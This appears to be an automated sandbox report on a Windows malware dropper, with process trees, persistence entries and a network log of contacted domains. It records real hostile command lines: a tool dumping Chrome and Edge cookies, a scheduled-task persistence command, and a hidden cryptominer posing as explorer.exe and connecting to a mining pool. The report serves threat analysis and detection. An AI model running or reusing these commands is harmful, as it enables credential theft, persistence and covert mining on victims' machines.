N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1412 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1412 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1412 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2252 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe
PID 2252 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe
PID 2252 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe
PID 2176 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2176 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe
PID 3416 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe
PID 3416 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe
PID 1636 wrote to memory of 4252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 1636 wrote to memory of 4252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 1636 wrote to memory of 4252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 2668 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.exe
PID 2668 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.exe
PID 2668 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.exe
PID 2080 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.exe
PID 2080 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.exe
PID 2080 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.exe
PID 3868 wrote to memory of 1588 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe
PID 3868 wrote to memory of 1588 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe
PID 3868 wrote to memory of 1588 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe
PID 4704 wrote to memory of 4372 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.exe
PID 4704 wrote to memory of 4372 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.exe
PID 4704 wrote to memory of 4372 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.exe
PID 552 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe
PID 552 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe
PID 552 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe
PID 4608 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe
PID 4608 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe
PID 4608 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe
PID 1504 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.exe
PID 1504 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.exe
PID 4252 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 4252 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 4252 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe
PID 1588 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp
PID 1588 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe

"C:\Users\Admin\AppData\Local\Temp\281c7ba6787d047d9eff840c79c19816.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_9.exe

sonia_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_7.exe

sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe

sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_6.exe

sonia_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe

sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_3.exe

sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_4.exe

sonia_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe

sonia_1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_2.exe

sonia_2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_1.exe" -a

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_1.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2176 -ip 2176

C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QVQSG.tmp\sonia_5.tmp" /SL5="$8002E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 560

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704172546 0

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCC8D7657\sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3756 -ip 3756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 1584

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 149.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
N/A 127.0.0.1:52799 tcp
N/A 127.0.0.1:52801 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 208.95.112.1:80 ip-api.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 superstationcity.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 53.96.141.3.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
DE 194.163.135.248:80 superstationcity.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 18.154.114.74.in-addr.arpa udp
NL 37.0.8.235:80 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 aucmoney.com udp
US 8.8.8.8:53 thegymmum.com udp
US 8.8.8.8:53 atvcampingtrips.com udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 kuapakualaman.com udp
US 8.8.8.8:53 renatazarazua.com udp
US 8.8.8.8:53 nasufmutlu.com udp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
DE 194.163.135.248:80 superstationcity.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
NL 37.0.11.8:80 tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 most-fast-link-download.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 ataninamei.xyz udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 f.youtuuee.com udp
GB 88.221.134.32:80 tcp
GB 88.221.134.32:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
FR 51.210.150.92:14433 tcp
US 8.8.8.8:53 f.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 92.150.210.51.in-addr.arpa udp
US 8.8.8.8:53 f.youtuuee.com udp
